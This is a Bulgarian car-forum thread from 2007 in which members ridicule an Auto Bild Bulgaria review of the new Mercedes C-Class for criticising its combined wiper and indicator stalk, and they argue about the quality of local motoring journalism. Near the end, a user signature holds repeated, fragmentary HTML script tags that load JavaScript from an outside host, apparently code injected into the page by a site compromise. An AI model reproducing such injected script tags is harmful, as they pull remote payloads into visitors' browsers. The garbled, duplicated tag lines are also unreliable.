Тъпотията на Auto Bild БългарияСтатия за новата Ц класа
Започната от top, 06 сеп 2007 - 22:47:18
20 мнения по тази тема
Публикувано 06 септември 2007 - 22:47
Купих си сега вечерта едно списание ауто билд от шел и сядам да чета една статия за новата ц класа и някакъв тъпанар журналист описва впечатленията му от тест дрйва на колата и започва да описва колко хубава била, това-онова, само положителни емоции и изведнъж с голямо учудване и едва ли не като основен недостатък на колата споменава "Няма го лостчето на чистачките отдясно. Незнайно защо чистачките и мигачите се управляват от един лост, който се намира отляво на волана. Не е много практично" - това му е коментара на тоя тъпак ! което значи че нищо не разбира от мерцедес защото аз не знам някой модел да има лост на чистачките отдясно до колкото съм карал поне 20 различни мерцедеса винаги е било от ляво и е комбинирано с мигачите и дългите. Даже и после на снимка са снимали лоста и коментара е "странно и непрактично решение". Кото я чета тая статия едва ли не останах с впечатление че за първи път комбинират лоста от ляво и досега чистачките винаги са били на отделен лост отдясно. И на края на статията като минус на колата пак лостчето... На мен пък ми е много удобно всичко да ми е от лявата страна и да нямам отдясно допълнителни лостчета които биха ми объркали. Така е в България пълна некомпетентност.
Публикувано 06 септември 2007 - 23:27
ауто билд и мен много ме дразнят по отношение преценката им към мерцедес
в много тестове между бмв и мерцедес - мерцедес-а е на второ място, само защото бил по тромав от бмв-то
спортът не се усещал толкова много колкото в бмв
и налагат тяхната си гледна точка
мен примерно ми е през о...я работа за спорта
аз искам като седна в колата да ми е удобно и да си се воза добре
мерцедес-ът е за комфортно возене !
а тва за чистачките без кометар
в много тестове между бмв и мерцедес - мерцедес-а е на второ място, само защото бил по тромав от бмв-то
спортът не се усещал толкова много колкото в бмв
и налагат тяхната си гледна точка
мен примерно ми е през о...я работа за спорта
аз искам като седна в колата да ми е удобно и да си се воза добре
мерцедес-ът е за комфортно возене !
а тва за чистачките без кометар
Публикувано 06 септември 2007 - 23:43
те толкова и в мерцедес са се качвали тия очилатковци. чули там нещо .. ..
Публикувано 07 септември 2007 - 00:31
Мдаа и аз доста идиотски коментари и статии съм чел там...
1991 190E SportLine turbo 0.6bar
Публикувано 07 септември 2007 - 01:05
Ама лошото е, че хората им вярват на тези тъпи списяния и после се правят на разбирачи.
Публикувано 07 септември 2007 - 09:02
не разбрах само - статията която си чел, от българи ли е написана или е преведена от немски?
в смисъл българи ли са го казали това или немци
Публикувано 07 септември 2007 - 09:20
не разбрах само - статията която си чел, от българи ли е написана или е преведена от немски?
Да, от българин, статията е писана в България а от Балкан Стар са взели колата.
Публикувано 07 септември 2007 - 09:42
Ами това обяснава всичкоДа, от българин, статията е писана в България а от Балкан Стар са взели колата.
Публикувано 07 септември 2007 - 12:45
абе като се замислих, не е възможно германец да казва товаАми това обяснава всичко
немските ауто билд са се качвали и тествали в какви ли не мерцедес-и
те правят и продължителни тестове до 100 000 км
нашите само превеждат механично и само коментарите по снимките ги превеждат по своему
а и още нещо, което съм забелязал - снимките на нашите са отвратителни
Публикувано 07 септември 2007 - 15:46
Немците са доста критични към колите, докато БГ журналистите се радват на всичко, което им дадат да карат и пишат само суперлативи, даже и за Лада.
Публикувано 07 септември 2007 - 18:03
Пълна некомпетентност!Имам чувството,че всички тия статии в АБ са поръчкови и обслужвот нечии интереси-неможе почти винаги при сравнение на няколко авт. АУДИ да е победител в съотношение цена-качество.Обърнете внимание симо!
Публикувано 07 септември 2007 - 19:47
Е аз поне един Мерцедес не се сещам да има с патерици около геврека,винаги на всичко чистачките и мигачите са си на едно място,ако ми ги преместят и няма да мога да ги намеря после.Тоя да кара Форд да го видим,на всеки модел различно ги слагат,аз от 123 се качвам на 2005 модел и всичко си е там където си е и на стария,по Фордове разни ровя по половин час да намеря кое къде е.Тоя заслужава един телефон до шефа му,да се сети да чете първо преди да пише или направо ако иска да се оплаче на Германците що така ги правят тия Мерцедеси вече 50+ години.
.
Публикувано 09 септември 2007 - 13:28
Селянин (човек от село) и селянин по душа са две коренно различни неща!
STI Ranger II 9x19
CZ 75 TS .40
Публикувано 09 септември 2007 - 22:06
Под статията стои резюме под формата на извод от един от редакторите на списанието - Денислав Стоянов. Не му се сърдете на момчето , то не знае какво прави . Само се снима като позьор с тези коли и явно не познава традициите в дизайна на марката. Съученик ми е момчето, но повече харесвам МВ. Да му простим редакторското невежество. Пък и е разбираемо - като се качиш за първи път в МВ всичко е тъй различно , сякаш си попаднал в бъдещето .
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
1 потребител(и) четат тази тема
0 потребители, 1 гости, 0 анонимни